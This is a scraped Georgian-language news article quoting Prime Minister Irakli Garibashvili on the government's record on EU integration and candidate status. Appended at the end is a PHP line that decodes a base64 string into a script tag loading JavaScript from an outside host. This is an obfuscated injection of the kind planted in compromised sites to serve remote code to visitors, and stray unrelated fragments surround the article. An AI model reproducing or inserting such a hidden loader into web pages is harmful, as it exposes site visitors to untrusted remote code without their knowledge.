celsiusi
ავერსი შნაიდერი
გამოდიან და ამბობენ: თუ არ მივიღებთ კანდიდატის სტატუსს, ეს იქნება მთავრობის პასუხისმგებლობაო. არავითარ შემთხვევაში, მეგობრებო! მთავრობამ გააკეთა მაქსიმუმი, დანარჩენი არის სამუშაო პროცესი, - ამის შესახებ პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა.
 
როგორც მან აღნიშნა, თუ ბოლო 30 წლის განმავლობაში ევროპასთან ინტეგრაციის კუთხით ვინმეს რაიმე გაუკეთებია, ეს „ქართული ოცნებაა“, რისი კულმინაციაც 3 მარტს ევროკავშირის წევრობაზე შეტანილი განაცხადი იყო.
 
„თუ ვინმეს ბოლო 30 წლის განმავლობაში ევროპასთან ინტეგრაციის კუთხით რაიმე გაუკეთებია, ეს არის „ქართული ოცნება“, იქნებოდა ეს ასოცირების ხელშეკრულება, თავისუფალი ვაჭრობა თუ უვიზო რეჟიმი, ამის კულმინაცია იყო 3 მარტს ჩვენს მიერ შეტანილი განაცხადი ევროკავშირის წევრობაზე. მანამდე, არაფერი ევროპული ქვეყანაში არ ხდებოდა, ეს იყო დიქტატორული რეჟიმის გამყარება ქვეყანაში. ჩვენმა პარტიამ კონსტიტუციაში ჩავწერეთ, რომ საგარეო პოლიტიკური კურსი არის ევროატლანტიკური, ჩვენ ევროკავშირთან და ბრიუსელთან შევთანხმდით, ასოცირების ხელშეკრულებაში ჩავწერეთ ყველა რეფორმა, რომელიც მთავრობამ უნდა გააგრძელოს. ვალდებულება, რომელიც აღებული გვაქვს დემოკრატიული რეფორმების გაგრძელების, ყველაფერს ვაგრძელებთ და მივიყვანთ ბოლომდე. იდეალური არცერთი ქვეყანა არ არის, მათ შორის არცერთი ევროპული სახელმწიფო არ არის იდეალური. პროგრესი, რომელსაც ჩვენ მივაღწიეთ არის როგორც შავი და თეთრი, ასეთი მკვეთრი განსხვავებაა, თუ რა ჩავიბარეთ და რა შედეგი დავდეთ ამ 9 წლის განმავლობაში“, - აღნიშნა ირაკლი ღარიბაშვილმა.
663
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");